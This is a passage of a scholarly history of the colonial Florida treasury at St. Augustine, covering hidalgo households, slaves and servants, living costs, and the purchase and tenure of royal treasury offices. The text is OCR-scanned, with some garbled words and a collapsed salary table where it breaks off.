Near town on the commons, the hidalgo's family like all the rest was allocated land for growing maize, and after the six-month season his cows browsed with those of commoners on the dry stalks. In 1600 the eighty families in town were said to own from two to ten head of cattle apiece. Some distance out of town, maybe two leagues, was the hidalgo's farm, where he and his household might spend part of the year consuming the produce on the spot.31 A gentleman was surrounded by dependents. The female rela- tives who attended his wife had their male counterparts in the numerous down-at-the-heels nephews and cousins who accom- panied his travels, lived in his house, and importuned him for a hand up the social ladder.32 As if these were not enough, through the institution ofcompadrazgo he placed himself within a stratified net- work of ritual kin. On the lowest level this was a form of social structuring. Free blacks or mulattoes were supposed to be attached to a patron and not to wander about the district answering to no one. Indians, too, accepted the protection of an important Spaniard, taking his surname at baptism and accepting his gifts. The progress of conquest and conversion could conceivably be traced in the surnames 20 The Expenses of Position of chiefs. Governor Ybarra once threatened to punish certain of them "with no intercession of godfathers.""33 The larger the group the hidalgo was responsible for the greater his power base. He himself had his own more important patron. Between people of similar social background, compadrazgo was a sign of friendship, business partnership, and a certain amount of complicity, since it was not good form to testify against a compare. TreasurerJuan Menendez Marquez was connected to many important families in town, including that of the Portuguese merchant Juan Nifiez de los Rios. Although it was illegal to relate oneself to gubernatorial or other fiscal authorities, Juan was also a compare of Governor Mendez de Canzo and three successive factors.34 Servants filled the intermediate place in the hidalgo's household between poor relatives and slaves. Sometimes they had entered service in order to get transportation to America, which was why the gentleman coming from Spain could bring only a few. One manser- vant coming to Florida to the governor's house had to promise to remain there eight years.35 The life of a servant was far from com- fortable, sleeping wrapped in his cloak at the door of his master's room and thankful to get enough to fill his belly. Still, a nondis- chargeable servant had a degree of security, and though not a family member he could make himself a place by faithful service. The Parish Register shows how Francisco Perez de Castafieda, who was sent from Xochimilco as a soldier came to be overseer of the Menendez Marquez ranch of La Chua and was married in the home of don Thomas.36 Slaves completed the household. Technically, these could be Indian or even Moorish, like the girl Isabel, who belonged to De Soto's wife Isabel de Bobadilla and was branded on her face.37 In actalit, almost all the slaves in Florida were black. Moors were uncommon, and the crown categorically refused to allow the en- slavement of Florida Indians, even those who were demonstrably treacherous. The native women whom Diego de Velasco had sold (one of them for 25 ducats), Visitor Castillo y Ahedo told through a translator that they were free, "and each one went away with the person of her choice."38 Governor Mendez de Canzo was forced to liberate the Surruques and Guales whom he had handed out as the spoils of war. One of the few Indian slaves after his time was the 21 The King's Coffer Campeche woman Maria, who was taken into the house of Gov- ernor Vega Castro y Pardo and subsequently bore a child "of father unknown. "39 The names of slaves were significant. Those who had come directly from Africa were identified by origin, as Rita Ganga, Maria Angola, or Arara, Mandinga, or Conga. Those born in the house were identified with the family: Maria de Pedrosa was Antonia de Pedrosa's slave; Francisco Capitin belonged to Francisco Menendez Marquez II, who in his youth had been Florida's first captain of cavalry. A good Catholic family saw that their slaves were Christian and the babies legitimate. In the Parish Register are recorded the occasions when slaves-married, baptized an infant, or served as sponsors to other slaves, mixed-bloods, or Indians. The parish priest entered the owner's name and, starting in 1664, frequently noted the shade of the slave's skin color: negro, moreno, mulato, orpardo. One family of house slaves belonging to the Menendez Marquez family are traceable in the registry for three generations. Sometimes there was evident affection between the races, as the time the slave Maria Luisa was godmother to the baby daughter of a captain.40 But on the whole, blacks were not trusted. Too many of them had run off and intermarried with thefierce Ais people of the coast.41 The hundred slaves in St. Augustine in 1606 (who included around forty royal slaves) were expected to fight on the side of any invader who promised them freedom. Treasury officials objected strongly to the captains' practice of putting their slaves on the payroll as drummers, fifers, and flag bearers. In their opinion the king's money should not be used to pay "persons of their kind, who are the worst enemies we can have."42 The number of slaves belonging to any particular family is not easy to determine. The problem with counting them from the Parish Register is that they never appear all at once, and about all that can be known is that from one date to another a certain slave owner had at least x number of different slaves at one time or another. By this rather uncertain way of numbering them, Juan Menendez Marquez owned seven slaves; his son Francisco, eleven (of whom three were infants buried nameless); Juan II had ten; and his brother Thomas, four besides those out at La Chua. When Francisco II died in penury he was still the owner of seven. Only three were of an age to be useful, the rest being either small children or pensioners rather like 22 The Expenses of Position himself.43 A conservative estimate of the number of adult slaves at one time in a gentleman's house might be about four. The price of slaves remained fairly constant during the sev- enteenth century. In 1616 Captain Pastrana's drummer; whose pay he collected, was worth 300 ducats (412 /2 pesos). During the 1650s a thirty-year-old Angola ranch hand sold for 500 pesos and a mulatto overseer for 600; a mulatto woman with three small children brought 955 pesos, and two other women sold for 600 and 300. As Account- ant Nicolhs Ponce de Le6n explained to the crown in 1674, an un- trained slave cost 150 pesos in Havana, but after he had learned a trade in St. Augustine he was valued at 500 pesos or more.44 The four trained adult slaves in the hypothetical household were worth some 2,000 pesos. All of these dependents and slaves the hidalgo fed, clothed, dosed with medicines, supplied with weapons or tools, andijpr-videdV with the services of the church in a manner befitting their station and connection with his house. There were other servants for whom he felt no comparable responsibility. Repartimiento Indians cleared the land and planted the communal and private maize fields with digging sticks and hoes, guarding the crop from crows and wild animals. Ordered up by the governor; selected by their chiefs, and adminis- tered by the royal officials, they lived in huts outside the town and were given a short ration of maize and now and then a small blanket or a knife for themselves and some axes and hoes. During the con- struction of the castillo as many as 300 Indians at a time were working in St. Augustine.45 In an attempt to stop the escalation of building costs, their wages were fixed at so many blankets or tools per week, with ornaments for small change. Indians were not supposed to be used for personal service but they often were, especially if for some misdeed they had been sentenced to extra labor. Commissary Gen- eralJuan Luengo declared that everyone of importance in Florida had his service Indians and so had all his kinsmen and friends.46 If one of these natives sickened and died he could be replaced with another. Native healers "curing in the heathen manner" had been discred- ited by their non-Christian origins and their inefficacy against Euro- pean diseases, but there was no prejudice against the native medicinal herbs, and even the friars resorted to the women who dispensed them. Medical care of a European kind was not expensive for anyone connected with the garrison. A surgeon, apothecary, and barber were 23 The King's Coffer on the payroll, and the hospital association to which every soldier belonged provided hospitalization insurance for one real per month. When an additional real began to be assessed for apothecary's insur- ance, the soldiers by means of petitions got the charge revoked and what they had paid on it refunded.47 With housing, labor; and medical care relatively cheap, consum- able supplies were the hidalgo's largest expense. There are two ways to estimate what it cost to feed and clothe an ordinary Spaniard in Florida: by the rations issued at the royal warehouses and by the prices of individual items. In the armadas, fighting seamen were issued a daily ration of one-and-a-half pounds hardtack, two pints wine, half a pound of meat or fish, oil, vinegar; and legumbres, which were probably dried legumes. During the period when the Florida garrisons were administered together with the Menendez armada, this practice was altered to enable a soldier to draw up to two-and-a- half reales in supplies per day from the royal stores.48 In spite of admonitions from governors and treasury officials that the cost of food was taking more and more of the soldiers' wages, the official allotment for rations was not changed, and any extra that the soldier drew was charged to his account. Gillaspie has figured that in the 1680s a soldier spent two-thirds of his regular pay on food, and it was probably more like 70 percent.49 By the end of the seventeenth century a soldier's wages would barely maintain a bachelor. A Franciscan, whose vow of poverty forbade him to touch money, received his stipend, tactfully called "alms," in two pounds of flour and one pint of wine a day, plus a few dishes and six blankets a year. He and his colleagues divided among themselves three arrobas (twenty-five-pound measures) of oil a year and the same of vinegar; six arrobas of salt, and some paper; needles, and thread. By 1640 the friars were finding their 115 ducats a year insufficient, in spite of the king's extra alms of clothing, religious books, wax, and the wine and flour with which to celebrate Mass. When they had their syndics sell the surplus from Indian fields to Havana, it was partly because they were 2,000 pesos in debt to the treasury.50 Commodity prices did not rise evenly throughout the period. According to the correspondence from St. Augustine, different necessities were affected at different times. From 1565 to 1602 the price of wine rose 40 percent and that of cotton prints from Rouen, 170 percent. The price of wheat flour seemed to rise fastest between 24 The Expenses of Position 1598 and 1602.51 From 1638 to the mid-1650s the primary problem was dependence upon moneylenders, compounded with the loss in purchasing power of the notes against unpaid situados and of the soldiers' certificates for back wages, both of which in the absence of currency were used for exchange. In 1654 the presidio managed to free itself from economic vassalage long enough to buy from suppliers other than those affiliated with the moneylenders. One situador (commissioned collector) said he was able to buy flour at one-sixth the price previous agents had been paying. 52 Between 1672 and 1689 there was rampant profiteering in the maize and trade goods used to feed and pay Indians working on the castillo. In 1687 the parish priest suddenly increased the costs on his entire schedule of obventions, from carrying the censer to conducting a memorial service.53 Throughout the Habsburg period the expense of keeping a slave or servant continued its irregular rise, whereas the salary of a royal official remained constant. Two undisputed facts of life were that imported items cost more in Florida than in either New Spain orHavanaand that any merchant able to fix a monopoly upon St. Augustine charged whatever the market would bear, Since prices of separate items were seldom reported except by individuals protesting such a monopoly, it is difficult to determine an ordinary price. Even in a ship's manifest the measurements may lack exactness for our purposes, if not theirs. How much cloth was there in a bundle or a chest? How many pints of wine in a bottle? Sometimes only a relative idea of the cost of things can be obtained. Wheat flour, which rose in 1598 from 58 to 175 ducats a pipe (126.6 gallons), at the new price cost two-and-a-half times as much by volume as wine or vinegar did in 1607. Nearly a hundred years later wheat was still so costly that the wages of the boy who swept the church for the sacristan were two loaves of bread a day, worth fifty pesos a year.54 In spite of the high Florida prices, an officer found it socially necessary to live differently from a soldier, who in turn made a distinction between himself and a common Indian. Indians supple- mented a maize, beans, squash, fish, and game diet with acorns, palm berries, heart-of-palm, and koonti root-strange foods which the Spanish ate only during a famine.5s An hidalgo's table was set with Mexican majolica rather than Guale pottery and seashells. It was supplied with "broken" sugar at 28 reales the arroba, and spices, kept 25 The King's Coffer in a locked chest in the dining room.56 His drinking water came from a spring on Anastasia Island. Instead of the soldier's diet of salt meat, fish, and gruelor ash-cakes, the hidalgo dined on wheaten bread, pork, and chicken raised on shellfish. Instead of the native cassina tea he had Canary wines at 160 pesos a barrel and chocolate at 3 pesos for a thousand beans of cacao.57 Pedro Menendez Marquez, the gov- ernor; said he needed 1,000 ducats a year for food in Florida, although his wife and household were in Seville.58 An hidalgo's lady did not use harsh homemade soaps on her fine linens; she had the imported kind at three pesos a pound or nineteen pesos a box.59 In the evening she lit lamps of nut oil or of olive oil at forty reales the arroba, instead of pine torches, smelly tallow candles, or a wick floating in lard or bear grease. There were wax candles for a special occasion such as the saint's day of someone in the family, but wax was dear: a peso per pound in Havana for the Campeche yellow and more for the white. When the whole parish church was lit with wax tapers on the Day of Corpus Christi the cost came to fifty pesos.60 In St. Augustine, where the common folk used charcoal only for cooking, the hidalgo's living rooms were warmed with charcoal braziers. One governor was said to keep two men busy at govern- ment expense cutting the firewood for his house.61 Even after death there were class distinctions. The hidalgo was buried in a private crypt, either in the sixteen-ducat section or the ten-ducat. Other plots of consecrated earth were priced at three or four ducats. A slave's final resting place cost one ducat, and a pauper was laid away free. It cost three times as much to bury an attache of Governor Quiroga y Losada's (thirty-six pesos) as an ordinary sol- dier (twelve pesos), on whom the priest declared there was no profit.62 Clothing was a primary expense and a serious matter. Uncon- verted Indians would readily kill parties of Spaniards for their clothes, or so it was believed. Blankets, cloth, and clothing served as currency. Tobacco, horses, and muskets were priced in terms of cloth or small blankets. Garrison debts to be paid by the deputy governor of Apalache in 1703 were not given a currency value at all but were expressed solely in yards of serge.63 Indians dressed in comfortable leather shirts and blankets. Rather than look like one of them a Spaniard would go in rags.64 A manifest for the Nuestra Senora del Rosario out of Seville gives the prices asked 26 The Expenses of Position in St. Augustine around 1607 for ready-made articles imported from Spain. Linen shirts with collar and cuffs of Holland lace cost forty- eight or sixty reales; doublets of heavy linen were twenty-nine, forty, and fifty-two reales; hose of worsted yarn cost twenty-eight reales the pair; a hat was thirty-four to forty-two reales. Breeches and other garments were made by local tailors and their native apprentices out of imported goods, with the cheapest and coarsest linen running six reales the yard, and Rouen cloth, ten and eighteen. Boots and shoes were made by a part-time cobbler from hides prepared at the tan- nery.65 The cheapest suit of clothes must have run to twenty ducats (twenty-seven-and-a-halfpesos). When Notary Juan Jimenez outfit- ted his son Alejandro as a soldier they ran up bills of seventy pesos to the shopkeeper; eleven pesos to the shoemaker and unstated amounts to the armorer; tailor, and washerman.66 An hidalgo had to be better dressed in his everyday clothes than the common soldier in his finest, and his dress clothes were a serious matter It was an age when state occasions could be postponed until the outfits of important participants were ready, and the official reports of ceremonies described costumes in detail. Governor Quiroga y Losada once wrote the king especially to say that he was having the royal officials wear cloaks on Sundays as it looked more dignified.67 The hidalgo's cloak, breeches, and doublet were colored taffeta at sixteen reales the yard or velvet at eight ducats. His boots were of expensive cordovan; his hose were silk and cost four-and-a- half pesos; his shirt had the finest lace cuffs and collar and detachable oversleeves that could cost twenty-four ducats. His dress sword cost eight ducats and his gold chain much more. When, to the professed shock of Father Leturiondo, Governor Torres y Ayala assumed the regal prerogative of a canopy during a religious procession, he may have been protecting his clothes.68 The elegant family and household, with sumptuous food and clothing-these were displays of wealth that anyone with a good income could ape. The crucial distinction of an hidalgo was his fighting capability, measured in his skill and courage, his weapons and horses, and the number of armed men who followed him. In Florida even the bureaucrats were men of war. Treasurer Juan Menendez Marquez went on visit (circuit inspection) with Bishop Juan de las Cabezas Altamirano, as captain of his armed escort. His son, Treasurer Francisco, subdued rebellious Apalache Province 27 The King's Coffer almost singlehandedly, executing twelve ringleaders and condemn- ing twenty-six others to labor on the fort. Francisco's son, Account- ant Juan II, defended the city from pirates, and in 1671 led a flotilla to attack the English settlement of Charles Town.69 Treasury officials were ordered to leave their swords outside when they came to their councils, for in a society governed by the chivalric code, war was not the only excuse for combat. Any insult to one's honor must be answered by laying hand to swordi, anidthe hidalgo who refused a formal challenge was disgraced. He couilTfno longer aspire to a noble title;the commonest soldier held him inr contempt.70 In Floridaevery free man and even some faverb-6ire arms. Soldiers, officers, officials, and Indian chiefs were issued weapons out of the armory and thereafter regarded them as private property. Prices of the regular issue of swords in 1607 andofifintlock muskets in 1702 were about the same: ten or eleven pesos. An ar- quebus, or matchlock musket, was worth half as much. Gunpowder for hand-held firearms was two-thirds peso per pound in 1702, twice as much as the coarser artillery powder. That other requirement of the knight-at-arms, his horse, was not as readily come by. A horse was expensiveand few survived the rough trip to Florida. On shipboard they were immobilized in slings, and when these swung violently against the rigging in bad weather the animals had to be cut loose and thrown overboard. Until midcen- tury the most common pack animal in Florida was still an Indian.72 Once horses had gotten a start, however they did well, being easily trained, well favored, and about seven spans high. Imported Cuban horses were available in the 1650s at a cost of 100 to 200 pesos, with a bred mare worth double. In the 1680s and '90s, mares were selling for 30 pesos and horses for 25, about twice as much as a draft ox.73 Horsemanship displays on the plaza had become a part of every holiday, with the ladies looking down in exquisite apprehension from second-story windows and balconies.74 The Indian nobility raised and rode horses the same as Spanish hidalgos. The chiefs of Apalache were carrying on a lively horse trade with English-allied Indians in 1700, when the Spanish put a stop to it for reasons of military secur- ity. 75 By that time a gentleman without his horse felt hardly present- able. When the parish priest Leturiondo locked the church on Saint Mark's Day and left for the woods to dig roots for his sustenance, his 28 The Expenses of Position mind was so agitated, he said, that he went on foot and took only one slave.76 The hidalgo of substance had an armed following of slaves or servants who were known as the people of his house, much as sailors and soldiers were called people of the sea or of war Sometimes there were reasons of security for such a retinue. A friar feared to travel to his triennial chapter meeting without at least one bodyguard, and, Bishop Diaz Vara Calder6n, when he made his visit to Florida in 1674-75, hired three companies of soldiers to accompany his prog- ress: one of Spanish infantry, one of Indian archers, and the other of Indian arquebusiers.77 About town an entourage was for prestige or intimidation. The crown, trying to preserve order and prevent the formation of rival authority in faraway places, forbade treasury officials to bring their followers to councils or have themselves accompanied in public; it was also forbidden to arm Indians or slaves.78 It was not merely the secular hidalgo who enjoyed his following. When Father Leturiondo went out by night bearing the Host to the dying, he summoned twelve soldiers from the guard- house and had the church bell tolled for hours to make the faithful join the procession.79 With all the expensive demands on him (public and private charities, providing for children, kee~ing_ upa large household, living on a grand scale, and maintaining his standing as a knight-at-arms), the hidalgo was in constant need of money-more money, certainly, than any royal office could presumably provide. As Interim Treasurer Portal y Maule6n once observed through his lawyer when one's parents were persons of quality it was not honor that one stood in need of, but a living.80 29 3 Proprietary Office SN the provinces of Florida, as elsewhere in the empire of the Spanish Habsburgs, a royal office was an item of property; the person holding title to it was referred to as the "proprietor." He had received something of value: the potential income not only of the salary but of numerous perquisites, supplements and opportunities for p rfit; and e he been recognizedubicysgtema hom the king delighted to honor. Perhaps he had put in twenty years of loyal drudgery on the books of the king's grants. Perhaps he had once saved the plate fleet from pirates. Perhaps it was not his services that were rewarded, but those of his ancestors or his wife's family. The archives are studded with bold demands for honors, rewards and specific positions, buttressed by generations of worthies. The peti- tioner himself might be deplorably unworthy, but such a possibility did not deter a generous prince from encouraging a family tradition of service. Appendix 2 (pages 143-48) shows the proprietors of treasury office, their substitutes and stewards, and the situadores. The date any one of them took office may have been found by accident in the correspondence or inferred from the Parish Register In some cases a proprietor went to New Spain before sailing to Florida, thus delaying his arrival by at least half a year. Treasurer Juan de Cevadilla and Accountant Lazaro Siez de Mercado were shipwrecked twice along their journey and reached St. Augustine two-and-a-half years after they were appointed.1 The scattering of forces among several forts 30 Proprietary Office before 1587 called for multiple substitutes and stewards. From 1567 to 1571 the fiscal officials assigned to Menendez's armada for the defense / of the Indies doubled as garrison inspectors and auditors and pos- sessed Florida treasury titles. During the Habsburg era a process occurred which could be called the "naturalization of the Florida coffer." To measure this phenomenon one must distinguish between those royal officials whose loyalty lay primarily with the Iberian peninsula and those who were Floridians, born or made. The simple typology of peninsular versus creole will not do, for many persons came to Florida and settled permanently. Pedro Menendez himself moved his household there. Of the twenty-one royally appointed or confirmed treasury officials who served in Florida, only eight had no known relatives already there. Four of the eight (Lazaro Siez de Mercado, Nicolis Ponce de Le6n, Juan de Arrazola, and Francisco Ramirez) joined the Floridians by intermarriage; another (Juan de Cueva), by compa- drazgo. One (Joseph de Prado) went on permanent leave, naming a creole in his place. Only two of the king's officials seem to have avoided entanglement in the Florida network: Santos de las Heras, who spent most of his time in New Spain, and Juan Fernandez de Avila, who was attached to the household of the governor and died after one year in office. From the time the king began issuing titles in 1571 until the Acclamation of Philip V in 1702 was a period of 131 years. The positions of treasurer and accountant were extant the entire time, and that of factor-overseer until 1628, making the total number of treasury office-years 319. The two royal officials who remained pristinely peninsular served eight years between them, deducting no time for communication lag, travel, or leaves. Florid- ians, whether born or naturalized, were in office at least 97 percent of possible time. One reason for the naturalization of the coffer was that the king felt obligated to the descendants of conquerors, and his sense of obligation could be capitalized on for appointments.2 The Menendez Marquez family, descended on the one side from the adelantado's sister; and on the other from a cousin of Governor Pedro Menendez Marquez, at one time or another held every office in the treasury, and their efforts to keep them were clearly encouraged by the crown. When in 1620 Treasurer Juan Menendez Marquez was appointed governor of Popayan in South America, he retained his Florida 31 The King's Coffer proprietorship by means of his eighteen-year-old son Francisco. As the treasurer was aged and might not live to return, he requested a future for the youth, assuring the Council that his son had been raised to the work of the office, had already served as an officer in the infantry, and was descended from the conquerors of the land. The official response was noncommittal: what was fitting would be provided.3 Francisco's position was ambiguous: neither interim treasurer nor proprietor. In 1627 word came to St. Augustine that the governor of Popayan was dead. When Francisco would not agree to go on half-salary and admit to being an interim appointee, Governor Rojas y Borja removed him from office and put in his own man, the former rations notary. The treasurer's son went to Spain to argue before the Council that "with his death the absence ofJuan Menendez Marquez was not ended that the use of his office should be." The young man pleaded that he was the sole support of his mother and ten brothers and sisters, and he bore down heavily on the merits of his ancestors. Philip IV's reaction was angry. If the king's lord and father (might he rest in glory) once saw fit to name Francisco Menendez Marquez treasurer with full salary in the absence of his father; it was not up to a governor to remove him without new orders from the royal person. Rojas y Borja, personally, was commanded to restore Francisco's salary, retroactively. Since the governor's term was concluding, he had to sign a note for the amount before he could leave town. Even without a formal future Francisco had found his right to succession supported by the crown. S Another wa in whiichlhcoffer became naturalized was by purchase, with Floridians coming forward to buy. The~ sa-e biffices was not shocking to sixteenth- and seventeenth-century administra- tors, who regarded popular elections as disorderly, conducive to corruption, and apt to set risky precedents.4 Many types of offices Were sold or "provided." In 1687 one could acquire a blank patent of captaincy for Florida by enlisting 100 new soldiers in Spain.5 To become the Florida governor; Salazar Vallecilla contracted to build a 500-ton galleon for the crown during his first year in office, and was suspended when the year passed and the galleon was not built.6 It was also possible to buy a benefice. When Captain Antonio de Argfielles, old and going blind, wanted to provide handsomely for his Francis- can son Joseph, he asked friends with influence to persuade the king 32 Proprietary Office to give him the position of preacher or some other honor and proudly promised to pay "though it should cost like a mitre."7 By the secondhalfof the sixteenth century most public offices in the Indies were venal, that is to say, salable by the crown.8 In 1604 these offices also became renounceable: they could be sold toa-second party for a payment of half their value to the coffer the first time, and one-third each time thereafter Offices of the treasury, however; were not included. It was feared that candidates would use fraud to recover the purchase price or that incompetents would find their way into office, and it was the crown's sincere purpose to approve only the qualified.9 This did not mean that no arrangement was possible. Juan Menendez Marquez obtained the Florida treasurership in 1593 when he was betrothed to the twelve-year-old daughter of the former treasurer, Juan de Posada, and of Catalina Menendez Marquez, the governor's sister. Francisco Ramirez received the accountancy in 1614 by agreeing to marry the former accountant's widow and sup- port her eight children.10 Not unnaturally, the members of the Council who made the proposals for treasury office regarded wealth as an evidence of sound judgment, and a candidate with means had ways to sweeten his selection. Bythe4630s-halfway-through the period we are studying-the king was desperatenoagh toxtendto the treasury the sal offices and also of renunciations, futures and /v retention. A governor in Florida might know nothing of the transaction until after the death of the incumbent, when the new proprietor presented himself with receipt and title; yet the only known opposi- tion to the sale of treasury offices came from Governor Marques Cabrera and was part of his campaign against creoles in general. When Thomis Menendez Marquez brought in the title to be ac- countant after the death of his brother Antonio, the governor refused to honor it, saying that Thomas was locally born and unfit. Marques Cabrera entreated the king to sell no more treasury offices to unde- v serving persons and to forbid the officials to marry locally-better) yet, to transfer them away from Florida altogether. The Junta de Guerra responded with a history of the official transactions in the case. According to its records, Antonio Menendez Marquez had paid 1,000 pesos cash to succeed his brotherJuan II in 1673, whenJuan was promoted from accountant in St. Augustine to factor in Havana. In 1682 Antonio (who was spending most of his time as situador in New 33 The King's Coffer Spain) had bought a future for their brother Thomas at a cost of 500 pesos. The Junta ordered the governor to install Thomas as account- ant immediately with retroactive pay.11 Three years later the Cdmara de Indias, which was the executive committee of the Council, ap- proved shipowner Diego de Florencia's request for a future to the next treasury vacancy for his son Matheo Luis.12 Floridians like Florencia were the ones who would know when offices were likely to fall vacant, and they may have been the only ones who wanted them. Proprietary offices were politely attributed to royal favorxaid y legizimizediby royal titles, but.the kinghad less and less to do with appointments. His rights of patronage were gradually alienated until all that remained as a royal prerogative was enforcing the contract. The complete contract between the king and his proprietor was contained in several documents: licenses, instructions, titles, and bond. The appointee leaving for the Indies from Spain received a number of licenses, of which some served as passports. Ordinarily, one could take his immediate family, three slaves, and up to four servants to the New World. Because the crown was anxious to preserve the faith pure for the Indians, there could be no one in the household of suspect orthodoxy. To discourage adventurers, tes- timony might have to be presented that none of the servants was leaving a spouse in Spain, and the official might have to promise to keep them with him for a period of time. Other licenses served as shipping authorizations. A family was permitted to take, free of customs, 400 to 600 ducats' worth ofjewels and plate and another 300 to 600 ducats' worth of household belongings. Sometimes the \ amount of baggage allowance was specified. Because of the crown policy of strict arms control, weapons were limited to the needs of a gentleman and his retinue. An official might be permitted six swords, six daggers, two arquebuses, and one corselet. At the option of the appointee the standard licenses could be supplemented by additional paperwork. Gutierre de Miranda carried instructions to the governor to grant him building lots and lands for planting and pasture as they had been given to others of his quality. Juan de Posada had a letter stipulating that situadores were to be chosen from the proprietary officials and were to receive an expense allowance.'3 Instructions for treasury office in the Indies followed a set for- mula, with most of the space devoted to duties at smelteries and 34 Proprietary Office mints. An official's copy could be picked up at the House of Trade or in Santo Domingo, or it might be sent to his destination. If he was already in St. Augustine he would receive his instructions along with his titles. Titles were equally standard in format. There were two of them: one to office in the treasury and the other as regidor of the cabildo. The treasury title addressed the appointee by name, calling him the king's accountant, treasurer; or factor-overseer of the provinces of Florida on account of the death of the former proprietor. After a brief description of the responsibilities of office the appointee was assured that in Florida "they shall give and do you all the honors, deferences, graces, exemptions, liberties, preeminences, prerogatives and im- munities and each and every other attribute which by reason of the said office you should enjoy." The salary was stated: invariably 400,000 maravedis a year from the products of the land.14 This was the only regular income the official was due, for municipal office in SFlorida was unsalaried. If the appointee was already in Florida, salaried time began the day he presented himself to be inducted into office; otherwise, on the day he set sail from San Luicar de Barrameda or Cadiz. By the time the crown withdrew coverage for travel time in S1695, Florida treasury offices had long been creole-owned. 15 The one thing that never appeared in an official's titles was a time limit. His Appointment, "at the king's pleasure," was understood to be for life. , The governor, by contrast, had a term of five or six years. He could threaten, fine, suspend, even imprison a proprietor; but he could not remove him. And when the governor's term expired and his residencia (judicial inquiry) came up, every official in the treasury would be waiting to lodge charges. The bond for treasury office, whether for the accountant, treas- urer, or factor-overseer, and whether for the status of proprietor, interim official, or substitute, was 2,000 ducats. The appointee was permitted to furnish it in the place of his choice and present a receipt. Once such offices began to be held by natives the bond was raised by subscription. As many as thirty-eight soldiers and vecinos at a time agreed to stand good if the treasury suffered loss because of the said official's tenure. The effect of this communal backing was that if the treasury official was accused of malfeasance and his bond was in danger of being called in, as in the cases of Francisco Menendez Marquez and Pedro Benedit Horruytiner; the whole town rose to his 35 / The King's Coffer defense. Nicolas Ponce de Le6n did not observe the formality of having his bond notarized. When the document was examined after his death, it was found that of his twenty-one backers, half had predeceased him, perhaps in the same epidemic, and only five of the others acknowledged their signatures.16 At the time of induction the treasury officialhoundhimselfby a -- --------- ---- ial -y -4-- ~ ~ solemn oathbefore God, the Evangels, and the True Cross-toabe i-honest and reliable. He presented his bond and his title. His belong- ings were inventoried, as they would again be at his death, transferral, or suspension. He was given key to the coffer and its contents als9 were inventoried. From that day forward he was meant never to take an independent fiscal action. Other officials at his treasury had access to the same books and locks on the same coffer He would join them to sign receipts and drafts. Together they would open, read, and answer correspondence. In the same solidarity they would attend auctions, visit ships, and initiate debt proceedings.17 Such cumber- some accounting by committee was intended to guarantee their probity, for the king had made his officials collegially responsible in order to watch each other. No single one of them could depart from rectitude without the collusion or inattention of his colleagues. A Spanish monarch had elevated ideals for his treasury officials. SBy law no proprietor might be related by blood or marriage to any other important official in his district. In Florida this was impractica- ble. The creole families were intricately intermarried and quickly absorbed eligible bachelors. Juan de Cevadilla described his predica- ment: [When] Your Majesty made me the grant of being treasurer here eight years ago I decided to establish myself in this corner of the world, and not finding many suitable to my quality I married dofia Petronila de Estrada Manrique, only daughter of Captain Rodrigo de Junco, factor of these provinces. If Your Majesty finds it inconvenient for father-in-law and son-in-law to be royal officials I shall gladly [accept a] transfer. / But the limitations of the land are such that not only are the royal officials related by blood and marriage, but the govern- ors as well.18 According to Spanish law, a proprietor was not to hold magisterial or political office or command troops.19 In St. Augustine the treasury 36 Proprietary Office officials were royal judges of the exchequer until 1621. They held the only political offices there were: places on the city council. They were also inactive officers of the garrison, who returned to duty with the first ring of the alarum. In a place known for constant war a man with self-respect did not decline to fight Indians or pirates. During the early sixteenth century, royal officials were necessarily granted sources of income to support them until their treasuries should have regular revenues. Juan de Afiasco and Luis Hernandez de Biedma, De Soto's accountant and factor; had permission to engage in Indian trade as long as the residents of Florida paid no customs. They and the two other treasury officials were to receive twelve square leagues of land each and encomiendas of tribute-paying natives.20 As the century wore on, such supplements to salaries were curtailed or forbidden. In most places treasury officials had already had their trading privileges withdrawn; they soon lost the right to operate productive enterprises such as ranches, sugar mills, or mines, for every time a royal official engaged in private business there was fresh proof of why he should not.21 The laws of the Indies lay lightly on St. Augustine, where the proprietors were more apt to be gov- erned by circumstance, and in 1580 the restriction on ranches and farms was removed. Accountant Thomas Menendez Marquez owned the largest ranch in Florida, shipping hides, dried meat, and tallow out the Suwannee River to Havana, where he bought rum to exchange for furs with the Indians who traded in the province of Apalache. Pirates once held him for ransom for 150 head of his cattle.22 Encomiendas were another matter. The New Laws of 1542-43 phasing them out for others forbade them altogether for officials of the treasury, who could not even marry a woman with encomiendas unless she renounced them.23 This created no hardship for the pro- prietors in St. Augustine. Although Pedro Men6ndez's contract had contained tacit permission to grant encomiendas in accordance with the Populating Ordinances of 1563, they were out of the question in Florida-where the seasonally nomadic Indians long refused to settle themselves in towns for the Spanish convenience, and the chiefs expected to receive tribute, not pay it.24 Eventually the natives consented to a token tribute, which in time was converted to a rotating labor service out of which the officials helped themselves- but there was never an encomienda.25 The expenses of a local treasury, including the salaries of its 37 The King's Coffer officers, were theoretically covered by its income. This was im- mediately declared impossible in Florida, where the coffer either had few revenues or its officials did not divulge them. The first treasurer; accountant, and factor-overseer occupied themselves in making their offices pay off at the expense of the crown and the soldiers. When instituting the situado, the king made no immediate provision for the payment of treasury officials. In 1577, however; when Florida was changed from a proprietary colony to a regular royal one, the crown was obliged to admit as a temporary expedient that half of the stated salaries might be collected from the situado. This concession was reluctantly repeated at two- to six-year intervals.26 The widows of officials who had served prior to regular salaries were assisted by grants.27 The royal officials pointed out between 1595 and 1608 that the revenues which they and the governor were supposed to divide pro rata were not enough to cover the other half of their salaries. Fines were insignificant, as were confiscations; the Indians paid little in tribute, and the tithes had been assigned to build the parish church. They did not think the colony could bear the cost of import duties. The treasure tax on amber and sassafras was difficult to collect.28 At last the crown resigned itself to the fact that the improvident treasury of the provinces of Florida would never pay its own way, much less support a garrison. The royal officials were allowed to collect the remainder of their salaries out of surpluses in the situado.29 In spite of an inflationary cost of living between 1565 and 1702, salaries, wages, and rations allowances did not rise in Florida. The king allowed his officials no payroll initiative. For a while the gov- ernor used the bonus fund of 1,500 ducats a year to reward merit and supplement the salaries of lower-echelon officers and soldiers on special assignment, but the crown gradually extended its control over that as well.30 Out of context, the figure of 400,000 maravedis, which was the annual salary of a proprietor, is meaningless.31 Table 1 shows the salary plus rations of several positions paid from the situado. The date is that of the earliest known reference after 1565. For comparative purposes, all units of account have been converted to ducats. Rations worth 2/ 2 reales a day were over and above salary for members of the garrison, among whom the treasury officials, the governor; and the secular priests counted themselves in this case.32 By 1676 at least, a 38 Proprietary Office TABLE 1 YEARLY SALARIES AND RATIONS IN ST AUGUSTINE IN THE SEVENTEENTH CENTURY v Salary Value Salary Position Governor Treasury proprietor Sergeant major Master of construction Master of the forge Parish priest Carpenter Company captain Chaplain Master pilot Surgeon Ensign Overseer of the slaves Sacristan Sergeant Officer in charge (cabo) Friar Infantryman Indian laborer 1693 Sacristan's sweeping boy 